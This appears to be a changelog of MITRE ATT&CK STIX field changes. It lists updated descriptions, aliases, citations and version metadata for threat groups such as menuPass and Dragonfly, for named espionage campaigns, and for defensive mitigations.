| external_references[7]['description'] | DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. | Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016. |
| external_references[7]['url'] | http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates | https://securelist.com/games-are-over/70991/ |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [menuPass](https://attack.mitre.org/groups/G0045) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://attack.mitre.org/groups/G0045) are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) [menuPass](https://attack.mitre.org/groups/G0045) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.(Citation: Palo Alto menuPass Feb 2017)(Citation: Crowdstrike CrowdCast Oct 2013)(Citation: FireEye Poison Ivy)(Citation: PWC Cloud Hopper April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-11 14:01:44.538000+00:00 | 2022-07-20 20:07:40.169000+00:00 |
| external_references[1]['source_name'] | menuPass | HOGFISH |
| external_references[1]['description'] | (Citation: Palo Alto menuPass Feb 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) | (Citation: Accenture Hogfish April 2018) |
| external_references[2]['source_name'] | Cicada | POTASSIUM |
| external_references[2]['description'] | (Citation: Symantec Cicada November 2020) | (Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) |
| external_references[3]['source_name'] | POTASSIUM | Stone Panda |
| external_references[3]['description'] | (Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) | (Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Symantec Cicada November 2020) |
| external_references[4]['source_name'] | Stone Panda | APT10 |
| external_references[4]['description'] | (Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Symantec Cicada November 2020) | (Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020) |
| external_references[5]['source_name'] | APT10 | menuPass |
| external_references[5]['description'] | (Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020) | (Citation: Palo Alto menuPass Feb 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018) |
| external_references[8]['source_name'] | HOGFISH | Cicada |
| external_references[8]['description'] | (Citation: Accenture Hogfish April 2018) | (Citation: Symantec Cicada November 2020) |
| external_references[9]['source_name'] | DOJ APT10 Dec 2018 | Accenture Hogfish April 2018 |
| external_references[9]['description'] | United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019. | Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018. |
| external_references[9]['url'] | https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion | https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf |
| external_references[10]['source_name'] | District Court of NY APT10 Indictment December 2018 | Crowdstrike CrowdCast Oct 2013 |
| external_references[10]['description'] | US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020. | Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017. |
| external_references[10]['url'] | https://www.justice.gov/opa/page/file/1122671/download | https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem |
| external_references[11]['source_name'] | Palo Alto menuPass Feb 2017 | FireEye APT10 April 2017 |
| external_references[11]['description'] | Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017. | FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017. |
| external_references[11]['url'] | http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/ | https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html |
| external_references[12]['source_name'] | Crowdstrike CrowdCast Oct 2013 | FireEye Poison Ivy |
| external_references[12]['description'] | Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017. | FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014. |
| external_references[12]['url'] | https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf |
| external_references[13]['source_name'] | FireEye Poison Ivy | FireEye APT10 Sept 2018 |
| external_references[13]['description'] | FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014. | Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018. |
| external_references[13]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf | https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html |
| external_references[14]['source_name'] | PWC Cloud Hopper April 2017 | Palo Alto menuPass Feb 2017 |
| external_references[14]['description'] | PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017. | Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017. |
| external_references[14]['url'] | https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf | http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/ |
| external_references[15]['source_name'] | FireEye APT10 April 2017 | PWC Cloud Hopper April 2017 |
| external_references[15]['description'] | FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017. | PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017. |
| external_references[15]['url'] | https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html | https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf |
| external_references[17]['source_name'] | Accenture Hogfish April 2018 | DOJ APT10 Dec 2018 |
| external_references[17]['description'] | Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018. | United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019. |
| external_references[17]['url'] | https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf | https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion |
| external_references[18]['source_name'] | FireEye APT10 Sept 2018 | District Court of NY APT10 Indictment December 2018 |
| external_references[18]['description'] | Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018. | US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020. |
| external_references[18]['url'] | https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html | https://www.justice.gov/opa/page/file/1122671/download |
| Description |
|---|
| [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY ) |
| Description for G0035 Dragonfly |
|---|
| [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 20:07:00.932000+00:00 | 2022-05-11 14:00:00.188000+00:00 |
| revoked | False | True |
| external_references[1]['source_name'] | Dragonfly 2.0 | DYMALLOY |
| external_references[1]['description'] | (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017) | (Citation: Dragos DYMALLOY ) |
| external_references[2]['source_name'] | IRON LIBERTY | Berserk Bear |
| external_references[2]['description'] | (Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY) | (Citation: Fortune Dragonfly 2.0 Sept 2017) |
| external_references[3]['source_name'] | DYMALLOY | IRON LIBERTY |
| external_references[3]['description'] | (Citation: Dragos DYMALLOY ) | (Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY) |
| external_references[4]['source_name'] | Berserk Bear | Dragonfly 2.0 |
| external_references[4]['description'] | (Citation: Fortune Dragonfly 2.0 Sept 2017) | (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017) |
| external_references[5]['source_name'] | US-CERT TA18-074A | Dragos DYMALLOY |
| external_references[5]['description'] | US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. |
| external_references[5]['url'] | https://www.us-cert.gov/ncas/alerts/TA18-074A | https://www.dragos.com/threat/dymalloy/ |
| external_references[6]['source_name'] | Symantec Dragonfly Sept 2017 | Fortune Dragonfly 2.0 Sept 2017 |
| external_references[6]['description'] | Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017. | Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018. |
| external_references[6]['url'] | https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group | http://fortune.com/2017/09/06/hack-energy-grid-symantec/ |
| external_references[7]['source_name'] | Fortune Dragonfly 2.0 Sept 2017 | Secureworks MCMD July 2019 |
| external_references[7]['description'] | Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018. | Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020. |
| external_references[7]['url'] | http://fortune.com/2017/09/06/hack-energy-grid-symantec/ | https://www.secureworks.com/research/mcmd-malware-analysis |
| external_references[8]['source_name'] | Dragos DYMALLOY | Secureworks IRON LIBERTY |
| external_references[8]['description'] | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. | Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020. |
| external_references[8]['url'] | https://www.dragos.com/threat/dymalloy/ | https://www.secureworks.com/research/threat-profiles/iron-liberty |
| external_references[9]['source_name'] | Secureworks MCMD July 2019 | Symantec Dragonfly Sept 2017 |
| external_references[9]['description'] | Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020. | Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017. |
| external_references[9]['url'] | https://www.secureworks.com/research/mcmd-malware-analysis | https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group |
| external_references[10]['source_name'] | Secureworks IRON LIBERTY | US-CERT TA18-074A |
| external_references[10]['description'] | Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020. | US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. |
| external_references[10]['url'] | https://www.secureworks.com/research/threat-profiles/iron-liberty | https://www.us-cert.gov/ncas/alerts/TA18-074A |
| Description |
|---|
| [CostaRicto](https://attack.mitre.org/groups/G0132) is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. [CostaRicto](https://attack.mitre.org/groups/G0132)'s targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.(Citation: BlackBerry CostaRicto November 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 20:41:50.305000+00:00 | 2022-10-12 19:18:38.430000+00:00 |
| Description |
|---|
| [Dust Storm](https://attack.mitre.org/groups/G0031) is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2019-03-22 20:14:29.575000+00:00 | 2022-09-29 21:28:39.974000+00:00 |
| external_references[2]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[2]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| Description |
|---|
| [Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components.(Citation: Talos Frankenstein June 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-26 19:57:42.132000+00:00 | 2022-09-19 21:44:20.477000+00:00 |
| Description |
|---|
| [Honeybee](https://attack.mitre.org/groups/G0072) is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada. It has been an active operation since August of 2017 and as recently as February 2018. (Citation: McAfee Honeybee) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-23 19:48:35.981000+00:00 | 2022-09-19 20:08:40.243000+00:00 |
| Description |
|---|
| [Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 22:12:11.717000+00:00 | 2022-09-22 20:54:08.611000+00:00 |
| Description |
|---|
| [Operation Wocao](https://attack.mitre.org/groups/G0116) described activities carried out by a China-based cyber espionage adversary. [Operation Wocao](https://attack.mitre.org/groups/G0116) targeted entities within the government, managed service providers, energy, health care, and technology sectors across several countries, including China, France, Germany, the United Kingdom, and the United States. [Operation Wocao](https://attack.mitre.org/groups/G0116) used similar TTPs and tools to APT20, suggesting a possible overlap.(Citation: FoxIT Wocao December 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 00:14:14.838000+00:00 | 2022-10-12 19:17:31.924000+00:00 |
| external_references[2]['url'] | https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf | https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf |
| Description |
|---|
| Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies. Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established.(Citation: McAfee Sharpshooter December 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-30 03:08:44.808000+00:00 | 2022-09-26 22:11:36.315000+00:00 |
| Description |
|---|
| [C0010](https://attack.mitre.org/campaigns/C0010) was a cyber espionage campaign conducted by UNC3890 that targeted Israeli shipping, government, aviation, energy, and healthcare organizations. Security researcher assess UNC3890 conducts operations in support of Iranian interests, and noted several limited technical connections to Iran, including PDB strings and Farsi language artifacts. [C0010](https://attack.mitre.org/campaigns/C0010) began by at least late 2020, and was still ongoing as of mid-2022.(Citation: Mandiant UNC3890 Aug 2022) |
| Description |
|---|
| [C0011](https://attack.mitre.org/campaigns/C0011) was a suspected cyber espionage campaign conducted by [Transparent Tribe](https://attack.mitre.org/groups/G0134) that targeted students at universities and colleges in India. Security researchers noted this campaign against students was a significant shift from [Transparent Tribe](https://attack.mitre.org/groups/G0134)'s historic targeting Indian government, military, and think tank personnel, and assessed it was still ongoing as of July 2022.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) |
| Description |
|---|
| [C0015](https://attack.mitre.org/campaigns/C0015) was a ransomware intrusion during which the unidentified attackers used [Bazar](https://attack.mitre.org/software/S0534), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [Conti](https://attack.mitre.org/software/S0575), along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated [Conti](https://attack.mitre.org/software/S0575) ransomware playbook based on the observed pattern of activity and operator errors.(Citation: DFIR Conti Bazar Nov 2021) |
| Description |
|---|
| [CostaRicto](https://attack.mitre.org/campaigns/C0004) was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. [CostaRicto](https://attack.mitre.org/campaigns/C0004) actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.(Citation: BlackBerry CostaRicto November 2020) |
| Description |
|---|
| [Frankenstein](https://attack.mitre.org/campaigns/C0001) was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including [Empire](https://attack.mitre.org/software/S0363). The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.(Citation: Talos Frankenstein June 2019) |
| Description |
|---|
| [FunnyDream](https://attack.mitre.org/campaigns/C0007) was a suspected Chinese cyber espionage campaign that targeted government and foreign organizations in Malaysia, the Philippines, Taiwan, Vietnam, and other parts of Southeast Asia. Security researchers linked the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign to possible Chinese-speaking threat actors through the use of the [Chinoxy](https://attack.mitre.org/software/S1041) backdoor and noted infrastructure overlap with the TAG-16 threat group.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: Kaspersky APT Trends Q1 2020)(Citation: Recorded Future Chinese Activity in Southeast Asia December 2021) |
| Description |
|---|
| [Night Dragon](https://attack.mitre.org/campaigns/C0002) was a cyber espionage campaign that targeted oil, energy, and petrochemical companies, along with individuals and executives in Kazakhstan, Taiwan, Greece, and the United States. The unidentified threat actors searched for information related to oil and gas field production systems, financials, and collected data from SCADA systems. Based on the observed techniques, tools, and network activities, security researchers assessed the campaign involved a threat group based in China.(Citation: McAfee Night Dragon) |
| Description |
|---|
| [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was a cyber espionage campaign targeting technology and manufacturing companies in East Asia, Western Europe, and North America since at least 2019. Security researchers noted the goal of [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), which was still ongoing as of May 2022, was likely the theft of proprietary information, research and development documents, source code, and blueprints for various technologies. Researchers assessed [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was conducted by actors affiliated with [Winnti Group](https://attack.mitre.org/groups/G0044), [APT41](https://attack.mitre.org/groups/G0096), and BARIUM.(Citation: Cybereason OperationCuckooBees May 2022) |
| Description |
|---|
| [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm) [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm) |
| Description |
|---|
| [Operation Honeybee](https://attack.mitre.org/campaigns/C0006) was a campaign that targeted humanitarian aid and inter-Korean affairs organizations from at least late 2017 through early 2018. [Operation Honeybee](https://attack.mitre.org/campaigns/C0006) initially targeted South Korea, but expanded to include Vietnam, Singapore, Japan, Indonesia, Argentina, and Canada. Security researchers assessed the threat actors were likely Korean speakers based on metadata used in both lure documents and executables, and named the campaign "Honeybee" after the author name discovered in malicious Word documents.(Citation: McAfee Honeybee) |
| Description |
|---|
| [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) was a global cyber espionage campaign that targeted nuclear, defense, government, energy, and financial companies, with many located in Germany, Turkey, the United Kingdom, and the United States. Security researchers noted the campaign shared many similarities with previous [Lazarus Group](https://attack.mitre.org/groups/G0032) operations, including fake job recruitment lures and shared malware code.(Citation: McAfee Sharpshooter December 2018)(Citation: Bleeping Computer Op Sharpshooter March 2019)(Citation: Threatpost New Op Sharpshooter Data March 2019) |
| Description |
|---|
| [Operation Spalax](https://attack.mitre.org/campaigns/C0005) was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The [Operation Spalax](https://attack.mitre.org/campaigns/C0005) threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to [APT-C-36](https://attack.mitre.org/groups/G0099), however identified enough differences to report this as separate, unattributed activity.(Citation: ESET Operation Spalax Jan 2021) |
| Description |
|---|
| [Operation Wocao](https://attack.mitre.org/campaigns/C0014) was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.(Citation: FoxIT Wocao December 2019) Security researchers assessed the [Operation Wocao](https://attack.mitre.org/campaigns/C0014) actors used similar TTPs and tools as APT20, suggesting a possible overlap. [Operation Wocao](https://attack.mitre.org/campaigns/C0014) was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.(Citation: FoxIT Wocao December 2019) |
| Description |
|---|
| Configure features related to account use like login attempt lockouts, specific login times, etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2019-06-13 16:07:21.233000+00:00 | 2022-10-21 15:52:18.525000+00:00 |
| Description |
|---|
| Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-11-19 20:44:07.442000+00:00 | 2022-10-21 15:52:12.722000+00:00 |
| Description |
|---|
| Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-31 13:09:22.442000+00:00 | 2022-10-21 15:51:57.176000+00:00 |
| Description |
|---|
| Block execution of code on a system through application control, and/or script blocking. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 20:11:42.195000+00:00 | 2022-02-28 19:50:41.210000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2019-06-10 20:53:36.319000+00:00 | 2022-10-21 15:52:06.295000+00:00 |
| Description |
|---|
| Set and enforce secure password policies for accounts. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2019-06-06 21:10:35.792000+00:00 | 2022-10-21 15:52:23.327000+00:00 |
| Description |
|---|
| A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
